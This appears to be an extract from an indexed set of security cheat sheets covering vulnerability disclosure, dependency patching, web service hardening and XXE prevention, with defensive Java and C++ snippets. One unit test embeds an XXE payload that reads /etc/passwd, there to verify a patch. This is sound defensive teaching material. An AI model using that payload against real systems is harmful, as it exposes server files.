Bug bounty programs incentivise researchers to identify and report vulnerabilities to organisations by offering rewards. These are usually monetary, but can also be physical items (swag). The process is often managed through a third party such as BugCrowd or HackerOne, who provide mediation between researchers and organisations.

When implementing a bug bounty program, the following areas need to be clearly defined:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#when-to-implement-a-bug-bounty-program","title":"When to Implement a Bug Bounty Program","text":"

Bug bounty programs have been adopted by many large organisations such as Microsoft, and are starting to be used outside of the commercial sector, including by the US Department of Defense. However, for smaller organisations they can bring significant challenges, and require a substantial investment of time and resources. These challenges can include:

Despite these potential issues, bug bounty programs are a great way to identify vulnerabilities in applications and systems. However, they should only be used by organisations that already have a mature vulnerability disclosure process, supported by strong internal processes to resolve vulnerabilities.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#publishing-contact-details","title":"Publishing Contact Details","text":"

The most important step in the process is providing a way for security researchers to contact your organisation. The easier it is for them to do so, the more likely it is that you'll receive security reports. The following list includes some of the common mechanisms that are used for this - the more of these that you can implement the better:

It is also important to ensure that frontline staff (such as those who monitor the main contact address, web chat and phone lines) are aware of how to handle reports of security issues, and who to escalate these reports to within the organisation.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#providing-reporting-guidelines","title":"Providing Reporting Guidelines","text":"

Alongside the contact details, it is also good to provide some guidelines for researchers to follow when reporting vulnerabilities. These could include:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#communicating-with-researchers","title":"Communicating With Researchers","text":"

Communication between researchers and organisations is often one of the hardest points of the vulnerability disclosure process, and can easily leave both sides frustrated and unhappy with the process.

The outline below provides an example of the ideal communication process:

Throughout the process, provide regular updates of the current status, and the expected timeline to triage and fix the vulnerability. Even if there is no firm timeline for these, the ongoing communication provides some reassurance that the vulnerability hasn't been forgotten about.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#researchers-demanding-payment","title":"Researchers Demanding Payment","text":"

Some individuals may approach an organisation claiming to have found a vulnerability, and demanding payment before sharing the details. Although these requests may be legitimate, in many cases they are simply scams.

One option is to request that they carry out the disclosure through a mediated bug bounty platform, which can provide a level of protection for both sides, as scammers are unlikely to be willing to use these platforms.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#disclosure","title":"Disclosure","text":""},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#commercial-and-open-source-software","title":"Commercial and Open Source Software","text":"

Once the vulnerability has been resolved (and retested), the details should be published in a security advisory for the software. It is important to remember that publishing the details of security issues does not make the vendor look bad. All software has security vulnerabilities, and demonstrating a clear and established process for handling and disclosing them gives far more confidence in the security of the software than trying to hide the issues.

At a minimum, the security advisory must contain:

Where possible it is also good to include:

Security advisories should be easy for developers and system administrators to find. Common ways to publish them include:

Some researchers may publish their own technical write-ups of the vulnerability, which will usually include the full details required to exploit it (and sometimes even working exploit code). For more serious vulnerabilities, it may be sensible to ask the researcher to delay publishing the full details for a period of time (such as a week), in order to give system administrators more time to install the patches before exploit code is available. However, once the patch has been released, attackers will be able to reverse engineer the vulnerability and develop their own exploit code, so there is limited value in delaying the full release.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#private-systems","title":"Private Systems","text":"

For vulnerabilities in private systems, a decision needs to be made about whether the details should be published once the vulnerability has been resolved. Most bug bounty programs give organisations the option of whether to disclose the details once the issue has been resolved, although it is not typically required.

Publishing these details helps to demonstrate that the organisation is taking a proactive and transparent approach to security, but can also result in potentially embarrassing omissions and misconfigurations being made public. In the event of a future compromise or data breach, they could also potentially be used as evidence of a weak security culture within the organisation. Additionally, they may expose technical details about internal systems, and could help attackers identify other similar issues. As such, this decision should be carefully evaluated, and it may be wise to take legal advice.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#rewarding-researchers","title":"Rewarding Researchers","text":"

Where researchers have identified and reported vulnerabilities outside of a bug bounty program (essentially providing free security testing), and have acted professionally and helpfully throughout the vulnerability disclosure process, it is good to offer them some kind of reward to encourage this kind of positive interaction in future. If monetary rewards are not possible then a number of other options should be considered, such as:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#further-reading","title":"Further Reading","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html","title":"Vulnerable Dependency Management Cheat Sheet","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The objective of this cheat sheet is to propose an approach for handling vulnerable third-party dependencies when they are detected, depending on the situation.

The cheat sheet is not tool-oriented, but it contains a Tools section informing the reader about free and commercial solutions that can be used to detect vulnerable dependencies, depending on the level of support for the technologies at hand.

Note:

Proposals mentioned in this cheat sheet are not silver bullets (recipes that work in all situations), but they can be used as a foundation and adapted to your context.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context","title":"Context","text":"

Most projects use third-party dependencies to delegate the handling of different kinds of operations, e.g. generation of documents in a specific format, HTTP communications, data parsing of a specific format, etc.

It's a good approach because it allows the development team to focus on the real application code supporting the expected business features. However, the dependencies bring an expected downside: the security posture of the real application now also rests on them.

This aspect is referenced in the following projects:

Based on this context, it's important for a project to ensure that all the third-party dependencies implemented are free of any security issues, and if they do contain any security issues, the development team needs to be aware of them and apply the required mitigation measures to secure the affected application.

It's highly recommended to perform automated analysis of the dependencies from the birth of the project. Indeed, if this task is added in the middle or at the end of the project, it can imply a huge amount of work to handle all the issues identified, which will in turn impose a huge burden on the development team and might block the advancement of the project at hand.

Note:

In the rest of the cheat sheet, when we refer to the development team, we assume that the team contains a member with the required application security skills, or can refer to someone in the company with these kinds of skills, to analyse the vulnerability impacting the dependency.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#remark-about-the-detection","title":"Remark about the detection","text":"

It's important to keep in mind the different ways in which a security issue is handled after its discovery.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#1-responsible-disclosure","title":"1. Responsible disclosure","text":"

See a description here.

A researcher discovers a vulnerability in a component and, after collaborating with the component provider, a CVE associated with the issue is created (sometimes a provider-specific vulnerability identifier is created, but a CVE identifier is generally preferred), allowing public referencing of the issue as well as of the available fix/mitigation.

If the provider doesn't properly cooperate with the researcher, the following results are expected:

Here, the vulnerability is always referenced in the global CVE database, which detection tools generally use as one of their several input sources.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#2-full-disclosure","title":"2. Full disclosure","text":"

See a description here, in the section about Computer Security.

The researcher decides to release all the information, including exploitation code/methods, on services like the Full Disclosure mailing list or Exploit-DB.

Here, a CVE is not always created, so the vulnerability is not always present in the global CVE database, potentially leaving detection tools blind to it unless they use other input sources.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#remark-about-the-security-issue-handling-decision","title":"Remark about the security issue handling decision","text":"

When a security issue is detected, it's possible to decide to accept the risk represented by the security issue. However, this decision must be taken by the Chief Risk Officer (with possible fallback to the Chief Information Security Officer) of the company, based on technical feedback from the development team that has analyzed the issue (see the Cases section) as well as the CVE's CVSS score indicators.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#cases","title":"Cases","text":"

When a security issue is detected, the development team can find itself in one of the situations (named Cases in the rest of the cheat sheet) presented in the sub-sections below.

If the vulnerability impacts a transitive dependency, then the action will be taken on the direct dependency of the project, because acting on a transitive dependency often impacts the stability of the application.

Acting on a transitive dependency requires the development team to fully understand the complete relation/communication/usage chain from the project's first-level dependency down to the dependency impacted by the security vulnerability, and this task is very time-consuming.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#case-1","title":"Case 1","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context_1","title":"Context","text":"

Patched version of the component has been released by the provider.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#ideal-condition-of-application-of-the-approach","title":"Ideal condition of application of the approach","text":"

A set of automated unit, integration, functional or security tests exists for the features of the application using the impacted dependency, allowing validation that the features remain operational.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#approach","title":"Approach","text":"

Step 1:

Update the version of the dependency in the project on a testing environment.

Step 2:

Run the tests; 2 outcome paths are possible:

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#case-2","title":"Case 2","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context_2","title":"Context","text":"

Provider informs the team that it will take a while to fix the issue, so a patched version will not be available for months.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#ideal-condition-of-application-of-the-approach_1","title":"Ideal condition of application of the approach","text":"

Provider can share any of the below with the development team:

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#approach_1","title":"Approach","text":"

Step 1:

If a workaround is provided, it should be applied and validated on the testing environment, and thereafter deployed to production.

If the provider has given the team a list of the impacted functions, protective code must wrap the calls to these functions to ensure that the input and the output data is safe.

Moreover, security devices, such as the Web Application Firewall (WAF), can handle such issues by protecting the internal applications through parameter validation and by generating detection rules for those specific libraries. Yet, in this cheat sheet, the focus is set on the application level in order to patch the vulnerability as close as possible to the source.

Example using Java code, in which the impacted function suffers from a Remote Code Execution issue:

public void callFunctionWithRCEIssue(String externalInput){\n//Apply input validation on the external input using regex\nif(Pattern.matches(\"[a-zA-Z0-9]{1,50}\", externalInput)){\n//Call the flawed function using safe input\nfunctionWithRCEIssue(externalInput);\n}else{\n//Log the detection of exploitation\nSecurityLogger.warn(\"Exploitation of the RCE issue XXXXX detected !\");\n//Raise an exception leading to a generic error sent to the client...\n}\n}\n

If the provider has provided nothing about the vulnerability, Case 3 can be applied, skipping Step 2 of this case. We assume here that, at least, the CVE has been provided.

Step 2:

If the provider has provided the team with the exploitation code, and the team has put a security wrapper around the vulnerable library/code, then execute the exploitation code to ensure that the library is now secure and doesn't affect the application.

If you have a set of automated unit, integration, functional or security tests for the application, run them to verify that the added protection code does not impact the stability of the application.

Add a comment in the project README explaining that the issue (specify the related CVE) is handled while waiting for a patched version, because the detection tool will continue to raise an alert for this dependency.

Note: You can add the dependency to the ignore list, but the ignore scope for this dependency must only cover the CVE related to this vulnerability, because a dependency can be impacted by several vulnerabilities, each having its own CVE.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#case-3","title":"Case 3","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context_3","title":"Context","text":"

Provider informs the team that they cannot fix the issue, so no patched version will be released at all (this also applies if the provider does not want to fix the issue or does not answer at all).

In this case the only information given to the development team is the CVE.

Notes:

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#ideal-condition-of-application-of-the-approach_2","title":"Ideal condition of application of the approach","text":"

Nothing specific, because here we are in a patch-it-yourself situation.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#approach_2","title":"Approach","text":"

Step 1:

If we are in this case due to one of the following conditions, it's a good idea to start a parallel study to find a better-maintained component or, if it's a commercial component with support, to put pressure on the provider with the help of your Chief Risk Officer (with possible fallback to the Chief Information Security Officer):

In all cases, here, we need to handle the vulnerability right now.

Step 2:

As we know the vulnerable dependency, we know where it is used in the application (if it's a transitive dependency, we can identify the first-level dependency using it via the IDE's built-in features or the dependency management system in use, such as Maven, Gradle, NuGet or npm). Note that the IDE is also used to identify the calls to the dependency.

Identifying calls to this dependency is fine, but it is only the first step. The team still lacks information on what kind of patching needs to be performed.

To obtain this information, the team uses the CVE content to learn what kind of vulnerability affects the dependency. The description property provides the answer: SQL injection, Remote Code Execution, Cross-Site Scripting, Cross-Site Request Forgery, etc.

After identifying the above 2 points, the team knows what type of patching needs to be applied (Case 2 with the protective code) and where to add it.

Example:

The team has an application using the Jackson API in a version exposed to CVE-2016-3720.

The description of the CVE is as follows:

XML external entity (XXE) vulnerability in XmlMapper in the Data format extension for Jackson\n(aka jackson-dataformat-xml) allows attackers to have unspecified impact via unknown vectors.\n

Based on this information, the team determines that the necessary patch will be to add pre-validation of any XML data passed to the Jackson API in order to prevent XML external entity (XXE) attacks.
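
A minimal sketch of such a pre-validation wrapper, in the spirit of the Case 2 protective code; the class name, helper name and the exact string checks are illustrative assumptions around jackson-dataformat-xml's XmlMapper:

import com.fasterxml.jackson.core.JsonProcessingException;\nimport com.fasterxml.jackson.dataformat.xml.XmlMapper;\n\npublic class SafeXmlInput {\nprivate static final XmlMapper XML_MAPPER = new XmlMapper();\n\n//Reject any payload carrying a DTD or entity declaration before it reaches the vulnerable XmlMapper\npublic static <T> T readValueSafely(String xml, Class<T> targetType) throws JsonProcessingException {\nString probe = xml.toLowerCase();\nif (probe.contains(\"<!doctype\") || probe.contains(\"<!entity\")) {\n//Optionally log the attempted exploitation (CVE-2016-3720) here before failing\nthrow new IllegalArgumentException(\"DTD and entity declarations are not allowed\");\n}\nreturn XML_MAPPER.readValue(xml, targetType);\n}\n}\n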

Step 3:

If possible, create a unit test that mimics the vulnerability, in order to ensure that the patch is effective and to have a way to continuously verify that the patch remains in place as the project evolves.
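
A minimal sketch of such a unit test using JUnit 5; it assumes the hypothetical SafeXmlInput wrapper sketched above (any equivalent protective code would do) and simply locks in the fact that a classic XXE payload is rejected:

import static org.junit.jupiter.api.Assertions.assertThrows;\n\nimport org.junit.jupiter.api.Test;\n\nclass XxePatchRegressionTest {\n@Test\nvoid rejectsExternalEntityPayload() {\n//Classic XXE payload, similar to public proof of concept code for this class of vulnerability\nString xxePayload = \"<?xml version='1.0'?>\"\n+ \"<!DOCTYPE data [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>\"\n+ \"<data>&xxe;</data>\";\n//The protective wrapper must refuse the payload for the patch to be considered effective\nassertThrows(IllegalArgumentException.class,\n() -> SafeXmlInput.readValueSafely(xxePayload, Object.class));\n}\n}\n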

If you have a set of automated unit, integration, functional or security tests for the application, run them to verify that the patch does not impact the stability of the application.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#case-4","title":"Case 4","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context_4","title":"Context","text":"

The vulnerable dependency is found during one of the following situations, in which the provider is not aware of the vulnerability:

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#ideal-condition-of-application-of-the-approach_3","title":"Ideal condition of application of the approach","text":"

Provider collaborates with you after being notified of the vulnerability.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#approach_3","title":"Approach","text":"

Step 1:

Inform the provider about the vulnerability by sharing the post with them.

Step 2:

Using the information from the full disclosure post or the pentester's exploitation feedback: if the provider collaborates, apply Case 2; otherwise, apply Case 3. In that case, instead of analyzing the CVE information, the team needs to analyze the information from the full disclosure post or the pentester's exploitation feedback.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#tools","title":"Tools","text":"

This section lists several tools that can be used to analyse the dependencies used by a project in order to detect vulnerabilities.

It's important to ensure, during the selection process of a vulnerable dependency detection tool, that the tool:

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html","title":"Web Service Security Cheat Sheet","text":""},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing guidance for securing web services and preventing web services related attacks.

Please note that due to the differences in implementation between different frameworks, this cheat sheet is kept at a high level.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#transport-confidentiality","title":"Transport Confidentiality","text":"

Transport confidentiality protects against eavesdropping and man-in-the-middle attacks against web service communications to/from the server.

Rule: All communication with and between web services containing sensitive features, an authenticated session, or transfer of sensitive data must be encrypted using well-configured TLS. This is recommended even if the messages themselves are encrypted because TLS provides numerous benefits beyond traffic confidentiality including integrity protection, replay defenses, and server authentication. For more information on how to do this properly see the Transport Layer Protection Cheat Sheet.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#server-authentication","title":"Server Authentication","text":"

Rule: TLS must be used to authenticate the service provider to the service consumer. The service consumer should verify the server certificate is issued by a trusted provider, is not expired, is not revoked, matches the domain name of the service, and that the server has proven that it has the private key associated with the public key certificate (by properly signing something or successfully decrypting something encrypted with the associated public key).

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#user-authentication","title":"User Authentication","text":"

User authentication verifies the identity of the user or the system trying to connect to the service. Such authentication is usually a function of the container of the web service.

Rule: If used, Basic Authentication must be conducted over TLS, but Basic Authentication is not recommended because it discloses secrets in plain text (base64 encoded) in HTTP headers.

Rule: Client Certificate Authentication using Mutual-TLS is a common form of authentication that is recommended where appropriate. See: Authentication Cheat Sheet.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#transport-encoding","title":"Transport Encoding","text":"

SOAP encoding styles are meant to move data between software objects into XML format and back again.

Rule: Enforce the same encoding style between the client and the server.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#message-integrity","title":"Message Integrity","text":"

This is for data at rest. The integrity of data in transit can easily be provided by TLS.

When using public key cryptography, encryption does guarantee confidentiality but it does not guarantee integrity since the receiver's public key is public. For the same reason, encryption does not ensure the identity of the sender.

Rule: For XML data, use XML digital signatures to provide message integrity using the sender's private key. This signature can be validated by the recipient using the sender's digital certificate (public key).

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#message-confidentiality","title":"Message Confidentiality","text":"

Data elements meant to be kept confidential must be encrypted using a strong encryption cipher with an adequate key length to deter brute-forcing.

Rule: Messages containing sensitive data must be encrypted using a strong encryption cipher. This could be transport encryption or message encryption.

Rule: Messages containing sensitive data that must remain encrypted at rest after receipt must be encrypted with strong data encryption, not just transport encryption.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#authorization","title":"Authorization","text":"

Web services need to authorize web service clients the same way web applications authorize users. A web service needs to make sure a web service client is authorized to perform a certain action (coarse-grained) on the requested data (fine-grained).

Rule: A web service should authorize its clients based on whether they have access to the method in question. Following an authentication challenge, the web service should check the privileges of the requesting entity to determine whether they have access to the requested resource. This should be done on every request, and a challenge-response authorization mechanism should be added for sensitive resources like password changes, primary contact details such as email, physical address, payment or delivery instructions.

Rule: Ensure access to administration and management functions within the Web Service Application is limited to web service administrators. Ideally, any administrative capabilities would be in an application that is completely separate from the web services being managed by these capabilities, thus completely separating normal users from these sensitive functions.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#schema-validation","title":"Schema Validation","text":"

Schema validation enforces constraints and syntax defined by the schema.

Rule: Web services must validate SOAP payloads against their associated XML schema definition (XSD).

Rule: The XSD defined for a SOAP web service should, at a minimum, define the maximum length and character set of every parameter allowed to pass into and out of the web service.

Rule: The XSD defined for a SOAP web service should define strong (ideally allow-list) validation patterns for all fixed format parameters (e.g., zip codes, phone numbers, list values, etc.).
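
A minimal sketch of schema validation in Java using the standard javax.xml.validation API; the class name and schema file location are illustrative, and the JAXP \"access external\" properties may not be supported by every parser implementation:

import java.io.File;\nimport java.io.StringReader;\nimport javax.xml.XMLConstants;\nimport javax.xml.transform.stream.StreamSource;\nimport javax.xml.validation.Schema;\nimport javax.xml.validation.SchemaFactory;\nimport javax.xml.validation.Validator;\n\npublic class SoapPayloadValidator {\n//Validate an incoming SOAP payload against the service's XSD before any further processing\npublic static void validate(String soapPayload) throws Exception {\nSchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);\nSchema schema = factory.newSchema(new File(\"service.xsd\")); //illustrative schema location\nValidator validator = schema.newValidator();\n//Defence in depth: forbid the validator itself from fetching external DTDs or schemas\nvalidator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\nvalidator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\");\nvalidator.validate(new StreamSource(new StringReader(soapPayload))); //throws SAXException if the payload does not conform\n}\n}\n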

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#content-validation","title":"Content Validation","text":"

Rule: Like any web application, web services need to validate input before consuming it. Content validation for XML input should include:

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#output-encoding","title":"Output Encoding","text":"

Web services need to ensure that the output sent to clients is encoded to be consumed as data and not as scripts. This is especially important when web service clients use the output to render HTML pages, either directly or indirectly using AJAX objects.

Rule: All the rules of output encoding apply, as per the Cross Site Scripting Prevention Cheat Sheet.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#virus-protection","title":"Virus Protection","text":"

SOAP provides the ability to attach files and documents to SOAP messages. This gives the opportunity for hackers to attach viruses and malware to these SOAP messages.

Rule: Ensure Virus Scanning technology is installed, and preferably inline, so files and attachments can be checked before being saved to disk.

Rule: Ensure Virus Scanning technology is regularly updated with the latest virus definitions/rules.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#message-size","title":"Message Size","text":"

Web services, like web applications, could be a target for DoS attacks in which attackers automatically send the web service thousands of large SOAP messages. This either cripples the application, making it unable to respond to legitimate messages, or takes it down entirely.

Rule: SOAP message size should be limited to an appropriate size limit. A larger size limit (or no limit at all) increases the chances of a successful DoS attack.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#availability","title":"Availability","text":""},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#resources-limiting","title":"Resources Limiting","text":"

During regular operation, web services require computational power such as CPU cycles and memory. Due to malfunctioning, or while under attack, a web service may require too many resources, leaving the host system unstable.

Rule: Limit the amount of CPU cycles the web service can use based on expected service rate, in order to have a stable system.

Rule: Limit the amount of memory the web service can use to avoid the system running out of memory. In some cases the host system may start killing processes to free up memory.

Rule: Limit the number of simultaneous open files, network connections and started processes.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#message-throughput","title":"Message Throughput","text":"

Throughput represents the number of web service requests served during a specific amount of time.

Rule: Configuration should be optimized for maximum message throughput to avoid running into DoS-like situations.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#xml-denial-of-service-protection","title":"XML Denial of Service Protection","text":"

XML Denial of Service is probably the most serious attack against web services, so the web service must provide the following validation:

Rule: Validation against recursive payloads.

Rule: Validation against oversized payloads.

Rule: Protection against XML entity expansion.

Rule: Validation against overlong element names. If you are working with SOAP-based web services, the element names are those SOAP Actions.

This protection should be provided by your XML parser/schema validator. To verify, build test cases to make sure your parser is resistant to these types of attacks (see the sketch below).
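
A minimal Java sketch of such a test, assuming a JAXP DocumentBuilderFactory (the class name, payload size, and handling are illustrative only and not part of the cheat sheet), could look like this:

import javax.xml.parsers.DocumentBuilderFactory;\nimport java.io.ByteArrayInputStream;\nimport java.nio.charset.StandardCharsets;\n\n// Hypothetical sanity check: feed the parser a deeply nested (recursive) payload\n// and observe whether it rejects the input or consumes excessive resources.\npublic class RecursivePayloadTest {\npublic static void main(String[] args) throws Exception {\nStringBuilder payload = new StringBuilder(\"<?xml version='1.0'?>\");\nfor (int i = 0; i < 50000; i++) payload.append(\"<a>\");\nfor (int i = 0; i < 50000; i++) payload.append(\"</a>\");\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\n// Disallowing DOCTYPEs also blocks entity expansion payloads\ndbf.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\ntry {\ndbf.newDocumentBuilder().parse(new ByteArrayInputStream(payload.toString().getBytes(StandardCharsets.UTF_8)));\nSystem.out.println(\"Parser accepted the payload - review resource limits\");\n} catch (Exception e) {\nSystem.out.println(\"Parser rejected the payload: \" + e);\n}\n}\n}\n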

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#endpoint-security-profile","title":"Endpoint Security Profile","text":"

Rule: Web services must be compliant with Web Services-Interoperability (WS-I) Basic Profile at minimum.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html","title":"XML External Entity Prevention Cheat Sheet","text":""},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

XML eXternal Entity injection (XXE), which is now included in the OWASP Top 10 under A4, is a type of attack against an application that parses XML input.

The XXE issue is referenced under ID 611 in the Common Weakness Enumeration (CWE).

This attack occurs when untrusted XML input containing a reference to an external entity is processed by a weakly configured XML parser.

This attack may lead to the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning from the perspective of the machine where the parser is located, and other system impacts. The following guide provides concise information to prevent this vulnerability.

For more information on XXE, please visit XML External Entity (XXE).

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#general-guidance","title":"General Guidance","text":"

The safest way to prevent XXE is always to disable DTDs (External Entities) completely. Depending on the parser, the method should be similar to the following:

factory.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\n

Disabling DTDs also makes the parser secure against denial of service (DoS) attacks such as Billion Laughs. If it is not possible to disable DTDs completely, then external entities and external document type declarations must be disabled in the way that's specific to each parser.

Detailed XXE Prevention guidance for a number of languages and commonly used XML parsers in those languages is provided below.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#cc","title":"C/C++","text":""},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#libxml2","title":"libxml2","text":"

The Enum xmlParserOption should not have the following options defined:

Note:

According to this post, starting with libxml2 version 2.9, XXE has been disabled by default, as committed in the following patch.

Search for the usage of the following APIs to ensure that XML_PARSE_NOENT and XML_PARSE_DTDLOAD are not defined in the parameters:

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#libxerces-c","title":"libxerces-c","text":"

When using XercesDOMParser, do this to prevent XXE:

XercesDOMParser *parser = new XercesDOMParser;\nparser->setCreateEntityReferenceNodes(true);\nparser->setDisableDefaultEntityResolution(true);\n

When using SAXParser, do this to prevent XXE:

SAXParser* parser = new SAXParser;\nparser->setDisableDefaultEntityResolution(true);\n

When using SAX2XMLReader, do this to prevent XXE:

SAX2XMLReader* reader = XMLReaderFactory::createXMLReader();\nreader->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#java","title":"Java","text":"

Java applications using XML libraries are particularly vulnerable to XXE because the default settings for most Java XML parsers have XXE enabled. To use these parsers safely, you have to explicitly disable XXE in the parser you use. The following describes how to disable XXE in the most commonly used XML parsers for Java.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#jaxp-documentbuilderfactory-saxparserfactory-and-dom4j","title":"JAXP DocumentBuilderFactory, SAXParserFactory and DOM4J","text":"

DocumentBuilderFactory, SAXParserFactory and DOM4J XML Parsers can be configured using the same techniques to protect them against XXE.

Only the DocumentBuilderFactory example is presented here. The JAXP DocumentBuilderFactory setFeature method allows a developer to control which implementation-specific XML processor features are enabled or disabled.

The features can either be set on the factory or the underlying XMLReader setFeature method.

Each XML processor implementation has its own features that govern how DTDs and external entities are processed. By disabling DTD processing entirely, most XXE attacks can be averted, although it is also necessary to disable or verify that XInclude is not enabled.

Since JDK 6, the flag FEATURE_SECURE_PROCESSING can be used to instruct the parser implementation to process XML securely. Its behaviour is implementation dependent. Even though it can help tackle resource exhaustion, it may not always mitigate entity expansion. More details on this flag can be found here.

For a syntax highlighted example code snippet using SAXParserFactory, look here. Example code disabling DTDs (doctypes) altogether:

import javax.xml.parsers.DocumentBuilder;\nimport javax.xml.parsers.DocumentBuilderFactory;\nimport javax.xml.parsers.ParserConfigurationException; // catching unsupported features\nimport javax.xml.XMLConstants;\nimport org.xml.sax.SAXException;\nimport java.io.IOException;\n\n...\n\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\nString FEATURE = null;\ntry {\n// This is the PRIMARY defense. If DTDs (doctypes) are disallowed, almost all\n// XML entity attacks are prevented\n// Xerces 2 only - http://xerces.apache.org/xerces2-j/features.html#disallow-doctype-decl\nFEATURE = \"http://apache.org/xml/features/disallow-doctype-decl\";\ndbf.setFeature(FEATURE, true);\n\n// and these as well, per Timothy Morgan's 2014 paper: \"XML Schema, DTD, and Entity Attacks\"\ndbf.setXIncludeAware(false);\n\n// remaining parser logic\n...\n} catch (ParserConfigurationException e) {\n// This should catch a failed setFeature feature\n// NOTE: Each call to setFeature() should be in its own try/catch otherwise subsequent calls will be skipped.\n// This is only important if you're ignoring errors for multi-provider support.\nlogger.info(\"ParserConfigurationException was thrown. The feature '\" + FEATURE\n+ \"' is not supported by your XML processor.\");\n...\n} catch (SAXException e) {\n// On Apache, this should be thrown when disallowing DOCTYPE\nlogger.warning(\"A DOCTYPE was passed into the XML document\");\n...\n} catch (IOException e) {\n// XXE that points to a file that doesn't exist\nlogger.error(\"IOException occurred, XXE may still be possible: \" + e.getMessage());\n...\n}\n\n// Load XML file or stream using an XXE agnostic configured parser...\nDocumentBuilder safebuilder = dbf.newDocumentBuilder();\n

If you can't completely disable DTDs:

